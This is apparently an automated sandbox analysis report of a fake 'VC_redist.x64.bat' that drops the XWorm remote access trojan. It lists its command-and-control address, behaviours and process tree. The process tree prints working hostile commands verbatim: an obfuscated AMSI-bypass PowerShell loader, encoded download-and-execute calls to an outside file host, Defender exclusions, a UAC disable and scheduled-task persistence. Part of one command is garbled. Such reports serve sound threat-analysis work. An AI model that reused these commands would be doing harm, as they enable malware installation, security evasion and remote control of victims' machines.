Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
01/03/2025, 23:41
General
-
Target
VC_redist.x64.bat
-
Size
27KB
-
MD5
59ed597b16bdecda0fa1f5317d679506
-
SHA1
e2117126d6e4b2dd02d4eee180c8f786c9b6424e
-
SHA256
8b095c70bb18e878b288db10c7b9d5de9ed2df22f075b30ed0cbf3fdcb2c9342
-
SHA512
d37b2f951d1093bb1f750d6996e080f0f5b20ac2cf5139f32f1b154bf2d4a61a8ecb033383e6a3d7fbb875dae63d147d7dc97bc241bf2da1497e378822004dea
-
SSDEEP
384:eQxxUGTxvOwLNVpRP5mx39dm7dQgh+1Oi:xxigvOwLDpd5mx39L
Malware Config
Extracted
xworm
3.1
185.172.175.125:5000
Uto2xJheY5reQlME
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file 2 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 6 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in System32 directory 14 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 62 IoCs
-
Modifies registry class 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{044d5863-2f1e-475c-8450-b49d013e28e2}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FnMaesvTQxBC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aMxYenfxdQimUI,[Parameter(Position=1)][Type]$fVAPLWHCmW)$DOFxUUHMVHq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'ecte'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+''+[Char](117)+'le',$False).DefineType('My'+'D'+'e'+'l'+'eg'+'a'+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+'s'+','+'A'+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$DOFxUUHMVHq.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aMxYenfxdQimUI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');$DOFxUUHMVHq.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+'H'+'i'+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+''+[Char](101)+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$fVAPLWHCmW,$aMxYenfxdQimUI).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $DOFxUUHMVHq.CreateType();}$BPosSaSOICDUk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+'c'+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+'n'+'s'+'af'+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+'o'+'d'+''+[Char](115)+'');$letRKyvtZQSJfO=$BPosSaSOICDUk.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jRmhQtjSKFwITpjKwea=FnMaesvTQxBC @([String])([IntPtr]);$APqDQFfxoTbtWRXPxuKhwk=FnMaesvTQxBC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eIukbgqnnjV=$BPosSaSOICDUk.GetMethod('Ge'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')));$PkvxWVDrhnldWe=$letRKyvtZQSJfO.Invoke($Null,@([Object]$eIukbgqnnjV,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$myPfjFkbxGsKfoygC=$letRKyvtZQSJfO.Invoke($Null,@([Object]$eIukbgqnnjV,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+''+'a'+'l'+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$fVuwPYm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PkvxWVDrhnldWe,$jRmhQtjSKFwITpjKwea).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$YdMyHyCCSfCFeJhNI=$letRKyvtZQSJfO.Invoke($Null,@([Object]$fVuwPYm,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+[Char](97)+''+'n'+''+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$GHoCLeEfMQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($myPfjFkbxGsKfoygC,$APqDQFfxoTbtWRXPxuKhwk).Invoke($YdMyHyCCSfCFeJhNI,[uint32]8,4,[ref]$GHoCLeEfMQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YdMyHyCCSfCFeJhNI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($myPfjFkbxGsKfoygC,$APqDQFfxoTbtWRXPxuKhwk).Invoke($YdMyHyCCSfCFeJhNI,[uint32]8,0x20,[ref]$GHoCLeEfMQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'s'+''+[Char](118)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Users\Admin\AppData\Roaming\svOrbEl0.exeC:\Users\Admin\AppData\Roaming\svOrbEl0.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\svOrbEl0.exeC:\Users\Admin\AppData\Roaming\svOrbEl0.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\chcp.comchcp.com 4373⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵
-
-
C:\Windows\system32\find.exefInd3⤵
-
-
C:\Windows\system32\find.exefind3⤵
-
-
C:\Windows\system32\findstr.exefiNdstr /L /I set C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat3⤵
-
-
C:\Windows\system32\findstr.exefiNdstr /L /I goto C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat3⤵
-
-
C:\Windows\system32\findstr.exefiNdstr /L /I echo C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat3⤵
-
-
C:\Windows\system32\findstr.exefiNdstr /L /I pause C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD4⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\FMyUS.eXe"C:\ProgramData\FMyUS.eXe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PdHGtqQL.exe"C:\Users\Admin\AppData\Local\Temp\PdHGtqQL.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\svOrbEl0.exe"C:\ProgramData\svOrbEl0.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\ProgramData\1ZRs6.EXe"C:\ProgramData\1ZRs6.EXe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol | find ":\"3⤵
-
C:\Windows\system32\mountvol.exemountvol4⤵
-
-
C:\Windows\system32\find.exefind ":\"4⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath C:\3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath F:\3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1348 -s 3684⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath D:\3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += 'l';$url += 'l';$url += 'l';$url += 'l';$url += 't';$url += 'm';$url += '.';$url += 'f';$url += 'M';$url += '2';$url += 'G';$url += 'z';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; InvokΦÇ╗ΦÇ╗Φ▒åσ╛╖:~13,1Φë▓ΘÑ┐σàïΘÑ┐:~26,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~54,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~49,1%Θÿ┐τ╗┤Φë▓σ░ö:~10,1%Θÿ┐τ╗┤Φë▓σ░ö:~22,1%Θÿ┐τ╗┤Φë▓σ░ö:~14,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~51,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~8,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~39,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~60,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1Φ▒åσ╛╖Θÿ┐τ╗┤:~58,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~32,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~51,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~4,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~19,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~31,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1Φë▓ΘÑ┐σàïΘÑ┐:~48,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~4,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~22,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~54,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~18,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~54,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1Φ▒åσ╛╖Θÿ┐τ╗┤:~57,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~51,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~43,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~12,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~18,1ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~30,1%Θÿ┐τ╗┤Φë▓σ░ö:~52,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%Θÿ┐τ╗┤Φë▓σ░ö:~39,1%Θÿ┐τ╗┤Φë▓σ░ö:~42,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~9,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~19,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~23,1%Φë▓ΘÑ┐σàïΘÑ┐:~0,1%Φë▓ΘÑ┐σàïΘÑ┐:~30,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~39,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~48,1%Φë▓ΘÑ┐σàïΘÑ┐:~57,1ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~33,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~51,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~18,1%Φë▓ΘÑ┐σàïΘÑ┐:~30,1%Θÿ┐τ╗┤Φë▓σ░ö:~37,1%Φë▓ΘÑ┐σàïΘÑ┐:~45,1%Φë▓ΘÑ┐σàïΘÑ┐:~10,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~7,1%Θÿ┐τ╗┤Φë▓σ░ö:~56,1Φë▓ΘÑ┐σàïΘÑ┐:~52,1%ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~12,1%Φë▓ΘÑ┐σàïΘÑ┐:~10,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~28,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~51,1%Θÿ┐τ╗┤Φë▓σ░ö:~54,1%ΦÇ╗ΘÑ┐τ╗┤ΘÑ┐:~30,1ΦÇ╗ΦÇ╗Φ▒åσ╛╖:~21,1%Φë▓ΘÑ┐σàïΘÑ┐:~45,1%Φ▒åσ╛╖Θÿ┐τ╗┤:~38,1%Φë▓ΘÑ┐σàïΘÑ┐:~10,1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 23c7983edf79c25c3c03babf577467ae dXM5lcI3yUCOMIqpwRThXA.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
